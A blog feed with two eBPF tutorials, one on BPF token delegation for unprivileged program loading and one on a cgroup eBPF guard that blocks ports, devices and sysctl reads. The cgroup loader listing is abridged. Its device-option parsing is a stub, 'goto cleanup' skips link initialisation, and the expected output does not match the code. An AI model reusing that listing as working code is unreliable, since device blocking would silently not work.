Forem: 云微

eBPF Tutorial by Example: BPF Token for Delegated Privilege and Secure Program Loading

云微 — Tue, 17 Mar 2026 07:48:37 +0000

Ever needed to let a container or CI job load an eBPF program without giving it full CAP_BPF or CAP_SYS_ADMIN? Or wanted to expose XDP packet processing to a tenant workload while ensuring it can only create the specific map types and program types you've approved? Before BPF token, the answer was binary: either you had the capabilities to do everything in BPF, or you could do nothing. There was no middle ground.

This is what BPF Token solves. Introduced by Andrii Nakryiko and merged in Linux 6.9, BPF token is a delegation mechanism that lets a privileged process (like a container runtime or systemd) create a precisely scoped permission set for BPF operations, then hand it to an unprivileged process through a bpffs mount. The unprivileged process can load programs, create maps, and attach hooks, but only the types that were explicitly allowed. No broad capabilities required.

In this tutorial, we'll set up a delegated bpffs mount in a user namespace, derive a BPF token from it, and use libbpf to load and attach a minimal XDP program, all from a process that has zero BPF capabilities of its own.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_token

Introduction to BPF Token: Solving the Privilege Problem

The Problem: All-or-Nothing BPF Capabilities

Traditional eBPF requires CAP_BPF for program loading and map creation, plus additional capabilities like CAP_PERFMON for tracing, CAP_NET_ADMIN for networking hooks, and CAP_SYS_ADMIN for certain advanced operations. These capabilities are inherently system-wide: you cannot namespace or sandbox CAP_BPF. As the kernel documentation explains, this is by design: BPF tracing helpers like bpf_probe_read_kernel() can access arbitrary kernel memory, which fundamentally cannot be scoped to a single namespace.

This creates a real problem in multi-tenant environments:

Container isolation: A Kubernetes pod that needs to run a simple XDP program must be given CAP_BPF + CAP_NET_ADMIN, which also grants it the ability to load any BPF program type and create any map type. There's no way to say "you can load XDP programs but not kprobes."
CI/CD pipelines: A build job that tests an eBPF-based observability tool needs root-equivalent capabilities to load programs, even though the test only exercises a specific, well-known program type.
Third-party integrations: A service mesh sidecar that attaches sockops programs needs capabilities that also grant it the ability to trace every process on the host.

The result is that organizations either give broad BPF capabilities (weakening their security posture) or prohibit BPF entirely in unprivileged contexts (limiting the technology's adoption).

The Solution: Scoped Delegation Through bpffs

BPF token takes a different approach. Instead of trying to namespace capabilities (which is fundamentally unsafe for BPF), it introduces an explicit delegation model:

A privileged process (container runtime, init system, platform daemon) creates a bpffs instance with specific delegation options that define exactly which BPF operations are allowed.
The privileged process passes this bpffs mount to an unprivileged process (container, CI job, tenant workload).
The unprivileged process derives a BPF token from the bpffs mount. The token is a file descriptor that carries the delegated permission set.
When the unprivileged process makes bpf() syscalls (through libbpf or directly), it passes the token fd. The kernel checks permissions against the token instead of against the process's capabilities.

The token is scoped along four independent axes:

Delegation Option	What It Controls	Example
`delegate_cmds`	Which `bpf()` commands are allowed	`prog_load:map_create:btf_load:link_create`
`delegate_maps`	Which map types can be created	`array:hash:ringbuf`
`delegate_progs`	Which program types can be loaded	`xdp:socket_filter`
`delegate_attachs`	Which attach types are allowed	`xdp:cgroup_inet_ingress` or `any`

Each axis is a bitmask. If a bit isn't set, the corresponding operation is denied even if the token is present. This gives platform engineers fine-grained control: you can allow a container to load XDP programs with array maps but deny it access to kprobes, perf events, or hash-of-maps.

The User Namespace Constraint

One critical design decision: a BPF token must be created inside the same user namespace as the bpffs instance, and that user namespace must not be init_user_ns. This is intentional. It means:

A host-namespace bpffs (the one at /sys/fs/bpf) does not produce usable tokens. Tokens only work when the bpffs is associated with a non-init user namespace.
The privileged parent configures the bpffs before passing it to the child, but the child (in its own user namespace) is the one that creates and uses the token.
This design prevents a process with an existing token from using it to escalate privileges outside its namespace boundary.

How libbpf Makes It Transparent

For applications built with libbpf (which is most of them), token usage is nearly transparent. You have three options:

Explicit path: Set bpf_object_open_opts.bpf_token_path when opening the BPF object. libbpf will derive the token from the specified bpffs mount.
Environment variable: Set LIBBPF_BPF_TOKEN_PATH to point to the bpffs mount. libbpf picks it up automatically.
Default path: If the default /sys/fs/bpf is a delegated bpffs in the current user namespace, libbpf uses it implicitly.

Once the token is derived, libbpf passes it to every relevant syscall (BPF_MAP_CREATE, BPF_BTF_LOAD, BPF_PROG_LOAD, and BPF_LINK_CREATE) without any source-code changes in the BPF application.

Writing the eBPF Program

The BPF side of this demo is intentionally minimal: a tiny XDP program on loopback. This keeps the focus on the token workflow. Here's the complete source:

// SPDX-License-Identifier: GPL-2.0
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>

char LICENSE[] SEC("license") = "GPL";

struct token_stats {
    __u64 packets;
    __u32 last_ifindex;
};

struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, 1);
    __type(key, __u32);
    __type(value, struct token_stats);
} stats_map SEC(".maps");

SEC("xdp")
int handle_packet(struct xdp_md *ctx)
{
    struct token_stats *stats;
    __u32 key = 0;

    stats = bpf_map_lookup_elem(&stats_map, &key);
    if (!stats)
        return 0;

    stats->packets++;
    stats->last_ifindex = ctx->ingress_ifindex;
    return XDP_PASS;
}

A few design choices to note:

BPF_MAP_TYPE_ARRAY was chosen because the delegation policy explicitly allows array maps. If we had used a hash map instead, loading would fail because the token doesn't grant hash map creation permission. This is the token model in action; even trivial program changes can be caught by the delegation policy.

SEC("xdp") matches the delegate_progs=xdp policy. If you changed this to SEC("kprobe/..."), the kernel would reject it at load time with an EPERM because kprobe isn't in the allowed program types.

XDP_PASS simply lets every packet through. The program's only purpose is to prove that a token-backed load and attach succeeded. In production, you'd replace this with real packet-processing logic.

User-Space Loader: Token-Backed Loading

The token_trace.c loader is a standard libbpf skeleton program with one key addition: it passes a bpf_token_path:

struct bpf_object_open_opts open_opts = {};

open_opts.sz = sizeof(open_opts);
open_opts.bpf_token_path = env.token_path;

skel = token_trace_bpf__open_opts(&open_opts);

From this point on, libbpf takes over. When it calls bpf(BPF_MAP_CREATE) to create stats_map, it includes the token fd. When it calls bpf(BPF_PROG_LOAD) for the XDP program, it includes the token fd. When it calls bpf(BPF_LINK_CREATE) to attach to the interface, it includes the token fd.

The rest of the loader is straightforward:

err = token_trace_bpf__load(skel);    // token used for map_create + prog_load
link = bpf_program__attach_xdp(skel->progs.handle_packet, ifindex);  // token used for link_create

After attaching, the loader reads the map before and after generating a test packet to verify the program executed:

err = bpf_map_lookup_elem(map_fd, &key, &before);
// ... generate UDP packet to 127.0.0.1 ...
err = bpf_map_lookup_elem(map_fd, &key, &after);
printf("delta          : %llu\n", after.packets - before.packets);

If the delta is 1, the XDP program was successfully loaded and attached using only delegated capabilities.

The Namespace Orchestrator: `token_userns_demo`

Because BPF token requires a non-init user namespace, running a bare token_trace -t /sys/fs/bpf on the host won't work. The token_userns_demo.c wrapper automates the complex namespace choreography. Here's the full sequence:

Step 1: Fork and Create Namespaces

parent (root, init_user_ns)          child (unprivileged, new userns)
         │                                        │
         │   fork()                               │
         ├────────────────────────────────────────>│
         │                                        │
         │                            unshare(CLONE_NEWUSER)
         │                            unshare(CLONE_NEWNS | CLONE_NEWNET)

The child creates a new user namespace (where it maps itself to uid/gid 0), a new mount namespace (so bpffs mounts are private), and a new network namespace (so lo is a fresh interface it can attach to).

Step 2: Create bpffs and Configure Delegation

parent (root, init_user_ns)          child (new userns)
         │                                        │
         │                            fs_fd = fsopen("bpf", 0)
         │   <───── send fs_fd via SCM_RIGHTS ────│
         │                                        │
    fsconfig(fs_fd, "delegate_cmds", ...)         │  (waiting for ack)
    fsconfig(fs_fd, "delegate_maps", "array")     │
    fsconfig(fs_fd, "delegate_progs", "xdp:...")  │
    fsconfig(fs_fd, "delegate_attachs", "any")    │
    fsconfig(fs_fd, FSCONFIG_CMD_CREATE)          │
         │                                        │
         │   ───────── send ack ─────────────────>│

The child calls fsopen("bpf", 0) to create a bpffs filesystem context in its user namespace, then sends the file descriptor to the parent via a Unix socket (SCM_RIGHTS). The parent, running as root in the init namespace, configures the delegation policy with fsconfig(), then materializes the filesystem with FSCONFIG_CMD_CREATE.

This two-step dance is necessary because: (a) the bpffs must be created in the child's user namespace (for the token to be valid there), but (b) only the privileged parent can set delegation options (because those options grant BPF capabilities).

Step 3: Mount and Load

child (new userns)
         │
    mnt_fd = fsmount(fs_fd, 0, 0)
    token_path = "/proc/self/fd/<mnt_fd>"
    set_loopback_up()
    exec("./token_trace", "-t", token_path, "-i", "lo")

The child materializes the bpffs as a detached mount (no mount point needed, since /proc/self/fd/<mnt_fd> gives a path), brings the loopback interface up in its network namespace, and execs token_trace with the bpffs path. From token_trace's perspective, it's just opening a BPF object with a token path. It doesn't know or care about the namespace setup.

Preparing a bpffs Mount Manually

If you want to experiment with the mount syntax outside the demo wrapper, the repository includes a helper script:

cd bpf-developer-tutorial/src/features/bpf_token
bash setup_token_bpffs.sh /tmp/bpf-token

This mounts bpffs at /tmp/bpf-token with:

delegate_cmds=prog_load:map_create:btf_load:link_create
delegate_maps=array
delegate_progs=xdp:socket_filter
delegate_attachs=any

Why socket_filter? libbpf performs a trivial program-load probe before loading the real BPF object. This probe uses a generic BPF_PROG_TYPE_SOCKET_FILTER program to detect kernel feature support. Without socket_filter in the delegation policy, the probe fails and libbpf refuses to proceed.

Why delegate_attachs=any? The same libbpf probe path also triggers attach-type validation in the kernel's token checking code. Using any avoids having to enumerate every possible attach type for probe compatibility.

Note that a host-namespace mount like this is useful for inspecting the delegation policy (e.g., with bpftool token list), but won't produce working tokens unless the bpf(BPF_TOKEN_CREATE) syscall comes from a matching non-init user namespace.

Compilation and Execution

Build all binaries:

cd bpf-developer-tutorial/src/features/bpf_token
make

Run the end-to-end demo:

sudo ./token_userns_demo

Expected output:

token path     : /proc/self/fd/5
interface      : lo (ifindex=1)
packets before : 0
packets after  : 1
delta          : 1
last ifindex   : 1

The delta: 1 confirms that the XDP program was successfully loaded and attached using a BPF token, with no CAP_BPF or CAP_SYS_ADMIN in the child process.

Add -v for verbose libbpf output to see the token being created and used:

sudo ./token_userns_demo -v

If you already manage your own delegated bpffs in a user namespace, you can run the loader directly:

./token_trace -t /proc/self/fd/<mnt-fd> -i lo

Real-World Applications

While this tutorial uses a minimal XDP program, the BPF token pattern scales to production scenarios:

Container runtimes (LXD, Docker, Kubernetes): Mount a delegated bpffs into a container with only the program and map types the workload needs. LXD already supports this through its security.delegate_bpf option.
CI/CD testing: Give build jobs the ability to load and test specific eBPF programs without granting them host-level capabilities. The delegation policy acts as an allowlist for BPF operations.
Multi-tenant BPF platforms: A platform daemon creates per-tenant bpffs mounts with different delegation policies. One tenant might be allowed XDP + array maps, while another might get tracepoint + ringbuf access.
LSM integration: Because BPF tokens integrate with Linux Security Modules, you can combine token delegation with SELinux or AppArmor policies for defense-in-depth. Each token gets its own security context that LSM hooks can inspect.

Summary

In this tutorial, we learned how BPF token provides a delegation model for eBPF privilege that goes beyond the binary "all or nothing" of Linux capabilities. We walked through the complete flow: a privileged parent configures a bpffs instance with specific delegation options, an unprivileged child in a user namespace derives a token from that bpffs, and libbpf transparently uses the token for map creation, program loading, and attachment. The result is a minimal XDP program running in an unprivileged context, something that was impossible before Linux 6.9.

BPF token is not a niche feature. It represents the kernel's answer to a fundamental question in the eBPF ecosystem: how do you safely share BPF capabilities in a multi-tenant world without granting unconstrained access to the BPF subsystem?

If you'd like to learn more about eBPF, visit our tutorial code repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or website https://eunomia.dev/tutorials/ for more examples and complete tutorials.

References

eBPF Tutorial: cgroup-based Policy Control

云微 — Tue, 24 Feb 2026 07:43:56 +0000

Do you need to enforce network access control on containers or specific process groups without affecting the entire system? Or do you need to restrict certain processes from accessing specific devices while allowing others to use them normally? Traditional iptables and device permissions are global, making fine-grained per-process-group control impossible.

This is the problem cgroup eBPF solves. By attaching eBPF programs to cgroups (control groups), you can implement policy control based on process membership—only processes belonging to a specific cgroup are affected. This enables container isolation, multi-tenant security, and sandbox environments. In this tutorial, we'll build a complete "policy guard" program that demonstrates TCP connection filtering, device access control, and sysctl read restrictions—three types of cgroup eBPF usage.

What is cgroup eBPF?

The core idea of cgroup eBPF is simple: attach an eBPF program to a cgroup, and all processes in that cgroup will be controlled by this program. Unlike XDP/tc which filter traffic by network interface, cgroup eBPF filters by process membership—put a container in a cgroup, attach a policy program, and that container's network access, device access, and sysctl reads/writes are all under your control. Processes in other cgroups are completely unaffected.

This model is perfect for container and multi-tenant scenarios. Kubernetes NetworkPolicy uses cgroup eBPF under the hood. You can also use it for device isolation (e.g., restricting which containers can access GPUs), security sandboxes (preventing reads of sensitive sysctls), and more. When a cgroup eBPF program denies an operation, userspace syscalls return EPERM (Operation not permitted).

cgroup eBPF Hook Points

1. `BPF_PROG_TYPE_CGROUP_SOCK_ADDR` - Socket Address Hooks

Triggered on socket address syscalls (bind/connect/sendmsg/recvmsg):

Hook	Section Name	Description
IPv4 bind	`cgroup/bind4`	Filter bind() calls
IPv6 bind	`cgroup/bind6`	Filter bind() calls
IPv4 connect	`cgroup/connect4`	Filter connect() calls
IPv6 connect	`cgroup/connect6`	Filter connect() calls
UDP sendmsg	`cgroup/sendmsg4`, `cgroup/sendmsg6`	Filter UDP sends
UDP recvmsg	`cgroup/recvmsg4`, `cgroup/recvmsg6`	Filter UDP receives
Unix connect	`cgroup/connect_unix`	Filter Unix socket connect

Context: struct bpf_sock_addr - contains user_ip4, user_port (network byte order)

Return semantics: return 1 = allow, return 0 = deny (EPERM)

2. `BPF_PROG_TYPE_CGROUP_DEVICE` - Device Access Control

Hook	Section Name	Description
Device access	`cgroup/dev`	Filter device open/read/write/mknod

Context: struct bpf_cgroup_dev_ctx - contains major, minor, access_type

Return semantics: return 0 = deny (EPERM), non-zero = allow

3. `BPF_PROG_TYPE_CGROUP_SYSCTL` - Sysctl Access Control

Hook	Section Name	Description
Sysctl access	`cgroup/sysctl`	Filter /proc/sys reads/writes

Context: struct bpf_sysctl - use bpf_sysctl_get_name() to get sysctl name

Return semantics: return 0 = reject (EPERM), return 1 = proceed

4. Other cgroup Hooks

cgroup_skb/ingress, cgroup_skb/egress - Packet-level filtering
cgroup/getsockopt, cgroup/setsockopt - Socket option filtering
cgroup/sock_create, cgroup/sock_release - Socket lifecycle
sockops - TCP-level optimization (attached via BPF_CGROUP_SOCK_OPS)

This Tutorial: cgroup Policy Guard

We implement a single eBPF object with three programs:

Network (TCP): Block connect() to a specified destination port
Device: Block access to a specified major:minor device
Sysctl: Block reading a specified sysctl (read-only, safer for testing)

Events are sent to userspace via ringbuf for observability.

Implementation

Shared Header: cgroup_guard.h

This header defines data structures shared between kernel and userspace:

// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
#ifndef __CGROUP_GUARD_H
#define __CGROUP_GUARD_H

#ifndef TASK_COMM_LEN
#define TASK_COMM_LEN 16
#endif

#define SYSCTL_NAME_LEN 64

enum event_type {
    EVENT_CONNECT4 = 1,
    EVENT_DEVICE   = 2,
    EVENT_SYSCTL   = 3,
};

struct event {
    __u64 ts_ns;
    __u32 pid;
    __u32 type;
    char comm[TASK_COMM_LEN];

    union {
        struct {
            __u32 daddr;  /* IPv4, network order */
            __u16 dport;  /* host order */
            __u16 proto;  /* e.g. 6 for TCP */
        } connect4;

        struct {
            __u32 major;
            __u32 minor;
            __u32 access_type;
        } device;

        struct {
            __u32 write;
            char name[SYSCTL_NAME_LEN];
        } sysctl;
    };
};

#endif /* __CGROUP_GUARD_H */

The event structure uses a union to store type-specific data for different events, saving space while maintaining a unified event format.

eBPF Program: cgroup_guard.bpf.c

// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
/* cgroup_guard.bpf.c - cgroup eBPF policy guard
 *
 * This program demonstrates three types of cgroup eBPF hooks:
 * 1. cgroup/connect4 - TCP connection filtering
 * 2. cgroup/dev - Device access control
 * 3. cgroup/sysctl - Sysctl read/write control
 */
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

#include "cgroup_guard.h"

char LICENSE[] SEC("license") = "Dual BSD/GPL";

/* ===== Configurable options: set by userspace before load ===== */
#define IPPROTO_TCP 6

const volatile __u16 blocked_tcp_dport = 0;                   /* host order */
const volatile __u32 blocked_dev_major = 0;
const volatile __u32 blocked_dev_minor = 0;
const volatile char denied_sysctl_name[SYSCTL_NAME_LEN] = {}; /* NUL-terminated */

/* ===== ringbuf: send denied events to userspace ===== */
struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 24); /* 16MB */
} events SEC(".maps");

static __always_inline void fill_common(struct event *e, __u32 type)
{
    e->ts_ns = bpf_ktime_get_ns();
    e->type = type;
    e->pid = (__u32)(bpf_get_current_pid_tgid() >> 32);
    bpf_get_current_comm(&e->comm, sizeof(e->comm));
}

/* Compare two strings, return 1 if equal, 0 if not
 * Note: b is volatile to handle const volatile rodata arrays correctly */
static __always_inline int str_eq(const char *a, const volatile char *b, int max_len)
{
#pragma unroll
    for (int i = 0; i < SYSCTL_NAME_LEN; i++) {
        char ca = a[i];
        char cb = b[i];
        if (ca != cb)
            return 0;
        if (ca == '\0')
            return 1;
    }
    return 1;
}

/* ===== 1) Network: block TCP connect4 to specified port =====
 * ctx: struct bpf_sock_addr
 * user_ip4/user_port: network byte order (need conversion)
 *
 * Return semantics:
 * - return 1: allow
 * - return 0: deny (userspace gets EPERM)
 */
SEC("cgroup/connect4")
int cg_connect4(struct bpf_sock_addr *ctx)
{
    if (blocked_tcp_dport == 0)
        return 1;

    if (ctx->protocol != IPPROTO_TCP)
        return 1;

    __u16 dport = bpf_ntohs((__u16)ctx->user_port);
    if (dport != blocked_tcp_dport)
        return 1;

    struct event *e = bpf_ringbuf_reserve(&events, sizeof(*e), 0);
    if (e) {
        fill_common(e, EVENT_CONNECT4);
        e->connect4.daddr = ctx->user_ip4; /* network order */
        e->connect4.dport = dport;         /* host order */
        e->connect4.proto = ctx->protocol;
        bpf_ringbuf_submit(e, 0);
    }

    return 0; /* deny -> userspace gets EPERM on connect */
}

/* ===== 2) Device: block access to specified major:minor =====
 * ctx: struct bpf_cgroup_dev_ctx { access_type, major, minor }
 *
 * Return semantics:
 * - return 0: deny (userspace gets EPERM)
 * - return non-zero: allow
 */
SEC("cgroup/dev")
int cg_dev(struct bpf_cgroup_dev_ctx *ctx)
{
    if (blocked_dev_major == 0 && blocked_dev_minor == 0)
        return 1;

    if (ctx->major != blocked_dev_major || ctx->minor != blocked_dev_minor)
        return 1;

    struct event *e = bpf_ringbuf_reserve(&events, sizeof(*e), 0);
    if (e) {
        fill_common(e, EVENT_DEVICE);
        e->device.major = ctx->major;
        e->device.minor = ctx->minor;
        e->device.access_type = ctx->access_type;
        bpf_ringbuf_submit(e, 0);
    }

    return 0; /* deny -> -EPERM */
}

/* ===== 3) Sysctl: block reading specified sysctl =====
 * ctx: struct bpf_sysctl
 * Use bpf_sysctl_get_name() to get name
 *
 * Return semantics:
 * - return 0: reject
 * - return 1: proceed
 * If return 0, userspace read/write returns -1 with errno=EPERM
 */
SEC("cgroup/sysctl")
int cg_sysctl(struct bpf_sysctl *ctx)
{
    char name[SYSCTL_NAME_LEN];
    int ret = bpf_sysctl_get_name(ctx, name, sizeof(name), 0);
    if (ret < 0)
        return 1;

    if (denied_sysctl_name[0] == '\0')
        return 1;

    /* Only deny reads, allow writes (safer for testing) */
    if (ctx->write)
        return 1;

    if (!str_eq(name, denied_sysctl_name, SYSCTL_NAME_LEN))
        return 1;

    struct event *e = bpf_ringbuf_reserve(&events, sizeof(*e), 0);
    if (e) {
        fill_common(e, EVENT_SYSCTL);
        e->sysctl.write = ctx->write;
#pragma unroll
        for (int i = 0; i < SYSCTL_NAME_LEN; i++) {
            e->sysctl.name[i] = name[i];
            if (name[i] == '\0')
                break;
        }
        bpf_ringbuf_submit(e, 0);
    }

    return 0; /* deny -> -EPERM */
}

Understanding the BPF Code

The overall logic of this program is clear: three cgroup hooks handle network connections, device access, and sysctl reads/writes respectively. Each hook follows the same workflow—check if the current operation matches the configured blocking rule, report an event via ringbuf and return 0 (deny) if it matches, otherwise return 1 (allow).

The cg_connect4 function uses SEC("cgroup/connect4") to attach at IPv4 connection time. There's an important detail here: ctx->user_port is in network byte order (big-endian), while our configured port is in host byte order, so we must convert with bpf_ntohs() before comparing. If the destination port matches our configured blocked_tcp_dport, the program returns 0, and the userspace connect() call fails with EPERM.

The cg_dev function handles device access. Its context struct bpf_cgroup_dev_ctx contains three key fields: major and minor identify the device (e.g., /dev/null is 1:3), and access_type indicates the access type (read/write/mknod). We simply compare whether major:minor matches the configured values.

The cg_sysctl function intercepts sysctl reads/writes under /proc/sys/. It uses bpf_sysctl_get_name() to get the sysctl name, in path format like kernel/hostname (slash-separated, not dots). We only block reads, allowing writes—this is safer for testing and won't accidentally change system configuration.

The configuration options at the top of the program are declared as const volatile. This is the standard CO-RE (Compile Once, Run Everywhere) pattern: these values are defaults (0 or empty string) at compile time, and userspace sets the actual values via skel->rodata-> before load(). This allows a single compiled BPF program to run with different configurations.

Userspace Loader: cgroup_guard.c

// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
/* cgroup_guard.c - Userspace loader for cgroup eBPF policy guard */
#include <errno.h>
#include <fcntl.h>
#include <getopt.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <unistd.h>
#include <arpa/inet.h>

#include <bpf/libbpf.h>

#include "cgroup_guard.skel.h"
#include "cgroup_guard.h"

static volatile sig_atomic_t exiting = 0;

static void sig_handler(int sig)
{
    (void)sig;
    exiting = 1;
}

static int libbpf_print_fn(enum libbpf_print_level level,
                           const char *format, va_list args)
{
    if (level == LIBBPF_DEBUG)
        return 0;
    return vfprintf(stderr, format, args);
}

static void usage(const char *prog)
{
    fprintf(stderr,
        "Usage: %s [OPTIONS]\n"
        "\n"
        "Options:\n"
        "  -c, --cgroup PATH           cgroup v2 path (default: /sys/fs/cgroup/ebpf_demo)\n"
        "  -p, --block-port PORT       block TCP connect() to this dst port (IPv4)\n"
        "  -d, --deny-device MAJ:MIN   deny device access for (major:minor)\n"
        "  -s, --deny-sysctl NAME      deny sysctl READ of this name\n"
        "  -h, --help                  show this help\n",
        prog);
}

static int handle_event(void *ctx, void *data, size_t data_sz)
{
    (void)ctx;
    (void)data_sz;

    const struct event *e = (const struct event *)data;

    if (e->type == EVENT_CONNECT4) {
        char ip[INET_ADDRSTRLEN] = {0};
        struct in_addr addr = { .s_addr = e->connect4.daddr };
        inet_ntop(AF_INET, &addr, ip, sizeof(ip));

        printf("[DENY connect4] pid=%u comm=%s daddr=%s dport=%u proto=%u\n",
               e->pid, e->comm, ip, e->connect4.dport, e->connect4.proto);
    } else if (e->type == EVENT_DEVICE) {
        printf("[DENY device]   pid=%u comm=%s major=%u minor=%u access_type=0x%x\n",
               e->pid, e->comm, e->device.major, e->device.minor, e->device.access_type);
    } else if (e->type == EVENT_SYSCTL) {
        printf("[DENY sysctl]   pid=%u comm=%s write=%u name=%s\n",
               e->pid, e->comm, e->sysctl.write, e->sysctl.name);
    }

    fflush(stdout);
    return 0;
}

int main(int argc, char **argv)
{
    const char *cgroup_path = "/sys/fs/cgroup/ebpf_demo";
    int block_port = 0;
    int dev_major = 0, dev_minor = 0;
    const char *deny_sysctl = NULL;

    /* Parse command line arguments */
    static const struct option long_opts[] = {
        { "cgroup",      required_argument, NULL, 'c' },
        { "block-port",  required_argument, NULL, 'p' },
        { "deny-device", required_argument, NULL, 'd' },
        { "deny-sysctl", required_argument, NULL, 's' },
        { "help",        no_argument,       NULL, 'h' },
        {}
    };

    int opt;
    while ((opt = getopt_long(argc, argv, "c:p:d:s:h", long_opts, NULL)) != -1) {
        switch (opt) {
        case 'c': cgroup_path = optarg; break;
        case 'p': block_port = atoi(optarg); break;
        case 'd': /* parse major:minor */ break;
        case 's': deny_sysctl = optarg; break;
        default: usage(argv[0]); return 1;
        }
    }

    libbpf_set_print(libbpf_print_fn);
    signal(SIGINT, sig_handler);
    signal(SIGTERM, sig_handler);

    /* Create cgroup directory if needed */
    mkdir(cgroup_path, 0755);

    int cg_fd = open(cgroup_path, O_RDONLY | O_DIRECTORY);
    if (cg_fd < 0) {
        fprintf(stderr, "open(%s) failed: %s\n", cgroup_path, strerror(errno));
        return 1;
    }

    /* Open and configure BPF skeleton */
    struct cgroup_guard_bpf *skel = cgroup_guard_bpf__open();
    if (!skel) {
        fprintf(stderr, "cgroup_guard_bpf__open() failed\n");
        close(cg_fd);
        return 1;
    }

    /* Write .rodata configuration (must be before load) */
    if (block_port > 0 && block_port <= 65535)
        skel->rodata->blocked_tcp_dport = (__u16)block_port;
    if (dev_major > 0 || dev_minor > 0) {
        skel->rodata->blocked_dev_major = (__u32)dev_major;
        skel->rodata->blocked_dev_minor = (__u32)dev_minor;
    }
    if (deny_sysctl) {
        snprintf((char *)skel->rodata->denied_sysctl_name,
                 SYSCTL_NAME_LEN, "%s", deny_sysctl);
    }

    /* Load BPF programs into kernel */
    int err = cgroup_guard_bpf__load(skel);
    if (err) {
        fprintf(stderr, "cgroup_guard_bpf__load() failed: %d\n", err);
        goto cleanup;
    }

    /* Attach programs to cgroup */
    struct bpf_link *link_connect = bpf_program__attach_cgroup(skel->progs.cg_connect4, cg_fd);
    struct bpf_link *link_dev = bpf_program__attach_cgroup(skel->progs.cg_dev, cg_fd);
    struct bpf_link *link_sysctl = bpf_program__attach_cgroup(skel->progs.cg_sysctl, cg_fd);

    /* Setup ring buffer for events */
    struct ring_buffer *rb = ring_buffer__new(bpf_map__fd(skel->maps.events),
                                              handle_event, NULL, NULL);

    printf("Attached to cgroup: %s\n", cgroup_path);
    printf("Config: block_port=%d, deny_device=%d:%d, deny_sysctl_read=%s\n",
           block_port, dev_major, dev_minor, deny_sysctl ? deny_sysctl : "(none)");

    /* Main event loop */
    while (!exiting) {
        err = ring_buffer__poll(rb, 200 /* ms */);
        if (err == -EINTR)
            break;
    }

    ring_buffer__free(rb);

cleanup:
    bpf_link__destroy(link_sysctl);
    bpf_link__destroy(link_dev);
    bpf_link__destroy(link_connect);
    cgroup_guard_bpf__destroy(skel);
    close(cg_fd);
    return err ? 1 : 0;
}

Understanding the Userspace Code

The userspace loader's core job is to attach BPF programs to the specified cgroup, then continuously poll the ringbuf to print denied events.

The program first uses getopt_long to parse command-line arguments, getting the cgroup path and three policy configurations. Then it uses open() with O_RDONLY | O_DIRECTORY to open the cgroup directory and get a file descriptor. This fd is the attach target—cgroup eBPF programs are attached to cgroup directories.

Next comes the standard skeleton workflow: open() opens the BPF object, set .rodata configuration, then load() loads it into the kernel. Note that configuration must be set before load—after load, .rodata becomes read-only.

Attaching uses bpf_program__attach_cgroup(prog, cg_fd) to attach each BPF program to the cgroup. Here we attach three programs: connect4, dev, and sysctl. After successful attachment, all processes in this cgroup will have their relevant operations go through these BPF programs.

Finally, the event loop. ring_buffer__poll() polls the ringbuf, calling the handle_event callback whenever events arrive to print them. This lets you see which operations are being denied in real-time.

Building

cd src/cgroup
make

Running

Terminal A: Start the loader

# Block: TCP port 9090, /dev/null (1:3), reading kernel/hostname
sudo ./cgroup_guard \
  --cgroup /sys/fs/cgroup/ebpf_demo \
  --block-port 9090 \
  --deny-device 1:3 \
  --deny-sysctl kernel/hostname

You should see:

Attached to cgroup: /sys/fs/cgroup/ebpf_demo
Config: block_port=9090, deny_device=1:3, deny_sysctl_read=kernel/hostname
Press Ctrl-C to stop.

Terminal B: Start test servers (outside cgroup)

# Start two HTTP servers
python3 -m http.server 8080 --bind 127.0.0.1 &
python3 -m http.server 9090 --bind 127.0.0.1 &

Terminal C: Test from within the cgroup

sudo bash -c '
echo $$ > /sys/fs/cgroup/ebpf_demo/cgroup.procs

echo "== TCP test =="
curl -s http://127.0.0.1:8080 >/dev/null && echo "8080 OK"
curl -s http://127.0.0.1:9090 >/dev/null && echo "9090 OK (unexpected)" || echo "9090 BLOCKED (expected)"

echo
echo "== Device test =="
cat /dev/null && echo "/dev/null OK (unexpected)" || echo "/dev/null BLOCKED (expected)"

echo
echo "== Sysctl test =="
cat /proc/sys/kernel/hostname && echo "sysctl read OK (unexpected)" || echo "sysctl read BLOCKED (expected)"
'

Expected output:

8080 OK - Port 8080 is allowed
9090 BLOCKED (expected) - Port 9090 is blocked
/dev/null BLOCKED (expected) - Device 1:3 is blocked
sysctl read BLOCKED (expected) - Reading kernel/hostname is blocked

Terminal A output (events)

[DENY connect4] pid=12345 comm=curl daddr=127.0.0.1 dport=9090 proto=6
[DENY device]   pid=12346 comm=cat major=1 minor=3 access_type=0x...
[DENY sysctl]   pid=12347 comm=cat write=0 name=kernel/hostname

One-click Test

We provide a test script that automatically compiles, starts servers, runs tests, and cleans up:

sudo ./test.sh

Verifying with bpftool

sudo bpftool cgroup tree /sys/fs/cgroup/ebpf_demo

When to Use cgroup eBPF

Choosing the right technology depends on your control granularity requirements.

cgroup eBPF's control granularity is process groups—put processes in a cgroup, attach a BPF program, and the policy applies to that group. This is perfect for container scenarios: each container is a cgroup, and you can set different network policies, device permissions, and sysctl access rules for different containers. When a process leaves the cgroup, the policy automatically stops applying—no manual cleanup needed.

XDP and tc's control granularity is network interfaces. They handle all traffic passing through a specific NIC, regardless of which process it comes from. If you need high-performance packet processing, DDoS protection, or load balancing, XDP/tc are better choices. But if you want "only allow container A to access port 80, while container B can access any port," XDP/tc become inconvenient.

seccomp-BPF's control granularity is individual processes. It filters system calls, such as preventing a process from calling fork, exec, or socket. seccomp is lower-level and suitable for process sandboxing. But it can't control network destination addresses or device major:minor—these higher-level semantics.

Traditional iptables/nftables are global. Rules you configure apply to all processes on the entire system—there's no way to say "this rule only affects container A."

In summary: if you need per-container/process-group policies, want to control network, devices, and sysctls together, and want policies to automatically follow process lifecycles, cgroup eBPF is the right choice.

Summary

